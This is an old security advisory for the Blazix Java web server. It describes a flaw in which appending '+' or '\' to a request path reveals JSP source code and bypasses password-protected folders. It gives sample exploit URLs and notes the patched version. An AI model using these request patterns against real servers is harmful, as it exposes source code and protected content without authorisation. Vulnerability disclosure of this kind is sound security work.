###################################################################### Luigi Auriemma Application: Blazix (http://www.blazix.com) Version: 1.2 and previous Bug: Bad management of files requested with at the end some "bad" characters with the ability to access any password protected folders Date: 24 Aug 2002 Author: Luigi Auriemma e-mail: aluigi@autistici.org web: aluigi.org ###################################################################### 1) Introduction 2) Bug 3) The Code 4) Fix ###################################################################### =============== 1) Introduction =============== Blazix is a commercial webserver totally written in Java. It has some feautures like the Ejb server (port 2050) and the admin server (port 3010) for change some parameters and for stop or restart the webserver. Some functions of this server are: Servlets 2.3 usage, ION, JMS, E-mail sending support, Cluster Management, Class Reloads, Automatic EJB Primary Keys generation, Virtual Hosting support and other. ###################################################################### ====== 2) Bug ====== The bug I want to describe is one of the most diffused problems in the current applications. It is the problem that have some operating sytems API that open files without checking some character that can be attached to the file name. In Blazix the "bad" characters are '+' and '\' (NOT %2b and %5c). With this bug we can view all the server side scripts in it and, more dangerous, we have free access to the password protected folders. Attention because the version 1.2.1 (released for some days) is still vulnerable to the "password protected folder access" (only the jsp view has been fixed in this release). ###################################################################### =========== 3) The Code =========== A] Jsp view examples: http://SERVER/jsptest.jsp+ http://SERVER/jsptest.jsp\ B] Free protected folder access examples (bugtest is a folder that I have created and protected with a password): http://SERVER/bugtest+/ http://SERVER/bugtest\/ If you don't have a protected folder you can quickly follow these simple steps: a) make a new folder called bugtest in webfiles b) copy webfiles\index.html in webfiles\bugtest\index.html c) add "role.user.url: /bugtest/*" in web.ini file d) close and restart the web server for load the new settings ###################################################################### ====== 4) Fix ====== The Blazix team has patched the server and you can see your real version in the Readme.txt file in the Blazix folder (it is the ONLY place where is written the real version). Blazix 1.2.2 can be downloaded from its homepage: http://www.blazix.com ######################################################################